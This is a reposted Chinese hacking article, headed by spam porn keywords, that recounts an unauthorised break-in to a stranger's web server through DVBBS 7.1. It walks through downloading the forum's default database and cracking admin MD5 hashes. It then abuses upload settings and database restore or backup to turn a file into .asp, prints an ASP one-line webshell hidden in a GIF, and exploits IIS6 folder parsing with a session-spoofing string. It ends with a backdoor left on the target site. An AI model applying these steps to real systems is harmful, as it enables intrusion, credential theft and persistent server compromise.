欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

DVBBS7.1后臺(tái)備份得到一個(gè)webshell

 更新時(shí)間:2007年02月09日 00:00:00   作者:  
轉(zhuǎn)自:http://www.wrsky.com/read.php?tid=565
作者:firefox+lvhuana


今天上午上網(wǎng)的時(shí)候,非常無(wú)聊,好友都不在線。

正在無(wú)聊的時(shí)候,突然qq響了,一個(gè)陌生人要加我,順便先看下他的資料,哦哦,原來(lái)這個(gè)人還有個(gè)人站點(diǎn)呢,通過(guò)他加我請(qǐng)求。然后開(kāi)始看他的個(gè)人站點(diǎn),原來(lái)是一個(gè)外掛站,暈糊中,外掛站點(diǎn)的人加我作什么。。。。

想想進(jìn)他的站點(diǎn)看看吧,打開(kāi)明小子的旁注工具2.2版本(這個(gè)啟動(dòng)速度快,我喜歡),掃了一下,看到他站點(diǎn)所在的服務(wù)器上面還有幾個(gè)站點(diǎn),再仔細(xì)掃了一下,發(fā)現(xiàn)一個(gè)dvbbs7.1的論壇的數(shù)據(jù)庫(kù)是默認(rèn)的dvbbs7.mdb,下載之,然后殺毒軟件查下沒(méi)有木馬存在(現(xiàn)在有些無(wú)聊的人喜歡放一個(gè)默認(rèn)數(shù)據(jù)庫(kù)名字的木馬來(lái)釣魚。。小心為好),打開(kāi)數(shù)據(jù)庫(kù)找到管理員的后臺(tái)賬號(hào)密碼和前臺(tái)賬號(hào)密碼散列,破解一下吧,運(yùn)氣不錯(cuò),幾分鐘md5的散列破解完畢了,全數(shù)字的前臺(tái)密碼。

登陸進(jìn)去,再登陸進(jìn)后臺(tái)。好久不搞國(guó)內(nèi)站了,手生中。。。。老思路,上傳一個(gè)自己制作的asp語(yǔ)句插入gif圖片中的asp木馬(當(dāng)然是更改為.gif了)。上傳成功,然后到后臺(tái)去還原數(shù)據(jù)庫(kù)去,暈乎乎的,怎么提示無(wú)法識(shí)別的數(shù)據(jù)庫(kù)格式,失敗了。。看來(lái)動(dòng)網(wǎng)現(xiàn)在成熟的多了,估計(jì)是對(duì)文件的頭部做了識(shí)別了??接著想辦法吧。。

看到現(xiàn)在7.1版本的都有了blog功能了,在后臺(tái)看看blog設(shè)置吧,突然看到有上傳設(shè)置哦,而且還可以設(shè)置上傳類型,增加一個(gè)mdb的文件格式吧,不錯(cuò)不錯(cuò),增加成功。然后自己在本地建立一個(gè)空的mdb數(shù)據(jù)庫(kù),里面的內(nèi)容為<%eval(request(\"lv\"))%>,然后把這個(gè)數(shù)據(jù)庫(kù)上傳,成功上傳,再暈,怎么不是直接顯示出相對(duì)路徑的?而是fileid=1。。再到后臺(tái)的blog管理那里找,找到上傳的文件夾是Boke/UploadFile/,然后在上傳管理那里找到了我上傳的mdb文件,這下看看動(dòng)網(wǎng)還能禁止我還原數(shù)據(jù)庫(kù)么???

成功還原數(shù)據(jù)庫(kù)為.asp了,嘿嘿,一個(gè)webshell到手了,然后進(jìn)入服務(wù)器,發(fā)現(xiàn)是win2k3的哦,看來(lái)執(zhí)行cmd是沒(méi)戲了,到處轉(zhuǎn)轉(zhuǎn)后找到d盤竟然能遍歷,還有ser-u安裝在d盤啊,瀏覽ServUDaemon.ini找到了目標(biāo)站的物理路徑,跳轉(zhuǎn)到目標(biāo)站的目錄,然后留后門,好了,玩完了,撤退。

鑒于是win2k3系統(tǒng)的,大家都應(yīng)該知道win2k3的一個(gè)文件夾名如果是.asp的話,這個(gè)文件夾里面的任何文件都做為asp來(lái)處理的,讓我們?cè)偕钊霚y(cè)試一下。在后臺(tái)備份那里把備份路徑改一下,改為.asp/,如果害怕失敗的話,就用url編碼一下那個(gè).,就是%2easp/,然后備份數(shù)據(jù)庫(kù),這樣就會(huì)得到一個(gè).asp的目錄,然后在上傳設(shè)置那里把文件上傳目錄設(shè)置為.asp/,這樣的話,所有的文件都上傳到這個(gè)文件夾里了?;氐角芭_(tái),上傳我的那個(gè)把一句話木馬插入gif文件的那個(gè)2006s.gif,上傳成功后,http://www.****.com/.asp/2006-2/200622714435439658.gif這個(gè)就是我們的shell了。用客戶端連接,得到一個(gè)2006的webshell,不過(guò)輸入密碼后進(jìn)入的時(shí)候會(huì)返回一個(gè)404錯(cuò)誤,原因是ie把.asp后面的省略了,再次把http://www.*****.com/.asp/2006-2/200622714435439658.gif放在?%23=Execute(Session(%22%23%22))&pageName=PageList前面,seesion欺騙了一下,這個(gè)webshell就能正常使用了。


垃圾文章,可能還有其他更簡(jiǎn)單的方法,希望大家誰(shuí)知道告訴一下。

相關(guān)文章

最新評(píng)論